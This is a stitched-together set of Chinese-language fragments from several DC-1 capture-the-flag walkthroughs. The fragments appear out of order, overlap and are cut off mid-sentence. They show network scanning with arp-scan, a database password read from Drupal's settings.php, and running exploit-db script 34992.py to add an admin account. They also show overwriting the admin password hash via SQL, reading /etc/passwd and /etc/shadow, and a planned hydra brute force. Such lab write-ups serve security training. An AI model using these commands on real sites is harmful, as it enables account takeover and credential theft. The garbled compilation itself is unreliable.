密码修改成功。 方法二:添加admin权限用户 drupal的exp中有个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号 searchsploit drupal 看一下脚本path searchsploit 34992.py -p 添加用户 python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.33.128 -u admin2 -p admin2 ...
账号admin密码123456 寻找flag3 4.7猜测进入各种重要文件夹 最终在home目录里找到flag4 www-data@DC-1:/home$ ls ls flag4 www-data@DC-1:/home$ cd flag4 cd flag4 www-data@DC-1:/home/flag4$ ls ls flag4.txt www-data@DC-1:/home/flag4$ cat flag4.txt cat flag4.txt Can you use this...
select * from users\G; 可以看到这个表存储的是账号和密码 修改admin这条数据的密码,我们需要一个加密过的密码。 通过寻找我们发现drupal的加密文件在scripts/password-hash.sh这个位置下。 退出mysql exit; 输入phpscripts/password-hash.sh 123456 这个时候我们获取了123456 加密后的密码 进入数据库执行 update user...
etc/shadow是/etc/passwd的影子文件,存有密码信息 cat /etc/passwd 或者tail -3 /etc/passwd #为了方便截图,只显示文件的最后三行 cat /etc/shadow #权限不够查看失败 发现有个叫flag4的账号,但是查看使用/etc/shadow失败,但是前面nmap扫描的时候发现了 ssh 服务,现在又发现了 flag4 用户,所以尝试使用hydra进...
运行部署好的虚拟机,提示需要账号密码,该靶机不提供密码需要自己去渗透提权 image-20200516125057852 因不知道DC-1靶机的IP,所有我们需要将靶机和攻击机kali放在同一个局域网里面,将Kali的网络适配器使用桥接模式 1.探测目标 方法一:使用arp-scan工具 探测同一区域中存活主机 ...
我们根据提示在/sites/default/settings.php中找到了数据库的账号密码,flag2也在这个文件内 账号:dbuser 密码:R0ck3t 连接到数据库查看 进入数据库查看表 users表中的密码是加密过的 使用\G显示的更便捷一点 由于drupal的加密是自己写的加盐算法,所以我们查找它网站下有没有加密的脚本或者文件 找到了它加密密码的...
1、所有的用户的账号和密码都在这两个文件中 2、/etc/passwd保存着每个用户账号。该文件只有管理员可以修改,但是对于所有的用户都可读 3、/etc/shadow保存着密码等信息。该文件只有系统管理员能够修改和查看,其他用户不能查看、修改。 cat /etc/passwd查看文件,提示flag在/home/flag4里面 ...
woc,这密码的加密方式让我一脸懵逼,那就试一下修改admin密码吧,在网上找到了修改语句update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';。现在admin的账号密码就是admin \ password了。
将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。 1.使用命令 arp -scan -l 列出当前局域网的所有设备,在DC-1的网络适配器查看到的mac地址和扫描出来的192.168.1.8一致。
运行部署好的虚拟机,提示需要账号密码,该靶机不提供密码需要自己去渗透提权 因不知道DC-1靶机的IP,所有我们需要将靶机和攻击机kali放在同一个局域网里面,将Kali的网络适配器使用桥接模式 1.探测目标 方法一:使用arp-scan工具 探测同一区域中存活主机 代码语言:javascript 复制 $ sudo arp-scan -l -l 使用网络接...